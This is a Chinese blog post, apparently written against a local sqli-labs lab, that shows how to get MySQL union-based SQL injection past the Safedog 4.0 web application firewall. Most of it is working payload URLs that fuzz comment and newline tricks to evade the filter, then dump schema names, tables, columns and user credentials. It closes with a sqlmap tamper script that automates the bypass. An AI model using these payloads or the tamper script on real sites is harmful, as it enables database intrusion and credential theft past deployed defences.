mysql联合注入绕过安全狗4.0

最新推荐文章于 2023-08-20 15:46:41 发布

小鱼儿waha

最新推荐文章于 2023-08-20 15:46:41 发布

阅读量1.8k

点赞数 5

分类专栏：渗透技巧文章标签：安全狗sql注入绕过

我希望自己永远怀着一颗学习的心！

本文链接：https://blog.csdn.net/q1352483315/article/details/90175002

版权

渗透技巧专栏收录该内容

30 篇文章 3 订阅

订阅专栏

环境

win2003
apache
mysql
php

操作

http://192.168.1.131/Less-1/index.php?id=1 数值型注入

首先判断是否存在注入点
这里使用的是科学记数法 简单粗暴
http://192.168.1.131/Less-1/index.php?id=1e0	不变
http://192.168.1.131/Less-1/index.php?id=1e9   报错


然后判断字段数 order by
http://192.168.1.131/Less-1/index.php?id=1 order by 1		 拦截
http://192.168.1.131/Less-1/index.php?id=1 order /*!by*/ 1   不拦截
结果：字段数为3

继续联合查询注入构造语句
http://192.168.1.131/Less-1/index.php?id=1e9 union select 1,2,3  拦截

小技巧:这里的科学计数法可以和union连写

http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3   拦截

判断可以fuzz进行绕过的地方
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3    拦截
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union selectx 1,2,3   拦截

不拦截的有
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3    不拦截

再判断我们不可以把select union关键词之间添加说明我们只能fuzz
http://192.168.1.131/Less-1/index.php?id=1e9union[fuzz]select 1,2,3
这个fuzz的地方了

试下我们常规的绕过吧 /**/ /*!*/ %0d%0a %23%0a
http://192.168.1.131/Less-1/index.php?id=1e9union/**/select 1,2,3             拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%0d%0a*/select 1,2,3      拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/**/select 1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0aselect/**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/*!50000select*//**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a*//*!50000select*//**/1,2,3   拦截
继续复杂点
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a/*!50000select*/1,2,3  拦截
加点符号干扰
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23!@@@@!!!%0a/*!50000select*/1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!-- -%23!@x\\\\\x@@@xx!!xx!%0a/*!50000select*/1,2,3 突破了

然后我们开始简化 把没用的字符去掉 
最简化：http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,2,3
提取关键词 -- -x%0a

继续注入
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database(),3       拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database/*!*/(),3  拦截
Fuzz：
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect1,database/*!*/(),3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselectx1,database/*!*/(),3  不拦截

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect[fuzz]1,database/*!*/(),3  

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,database/*!*/(),3  不拦截

爆库名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(SCHEMA_NAME),3 from information_schema.SCHEMATA  不拦截

爆表名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(table_NAME),3 from information_schema.tables where table_schema='security' 不拦截

爆字段名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' and TABLE_SCHEMA = 'Security'拦截


思考下 拦截单引号吗 那为什么爆表名的时候为什么不会拦截 关键词吗 比如TABLE_NAME and 之类的

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' anxd TABLE_SCHEMA = 'Security' 报错

http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' && TABLE_SCHEMA = 'Security'  拦截

单引号可能拦截 我们16进制编码看下
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME =0x7573657273 && TABLE_SCHEMA =0x5365637572697479   不拦截

最后查询内容
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,concat(0x7e,username,0x7e,password,0x7e),3 from users   不拦截

编写tamper

思路：直接利用re替换\s空格为关键词

#!/usr/bin/env python
# author:cbd666
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with plus ('+')

    Notes:
        * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards
        * This tamper script works against all databases

    >>> tamper('SELECT id FROM users')
    'SELECT+id+FROM+users'
    """

    retVal = payload

    if payload:
        retVal = re.sub(r'\s',r"-- -x%0a",payload)

    return retVal

希望大家能够学习到！！可以的话也分享下这篇文章！！！

小鱼儿waha

关注

5
点赞
踩
12

收藏

觉得还不错? 一键收藏
4
评论
mysql联合注入绕过安全狗4.0

环境win2003apachemysqlphp操作http://192.168.1.131/Less-1/index.php?id=1 数值型注入首先判断是否存在注入点这里使用的是科学记数法简单粗暴http://192.168.1.131/Less-1/index.php?id=1e0 不变http://192.168.1.131/Less-1/index.php?id=1...
复制链接

扫一扫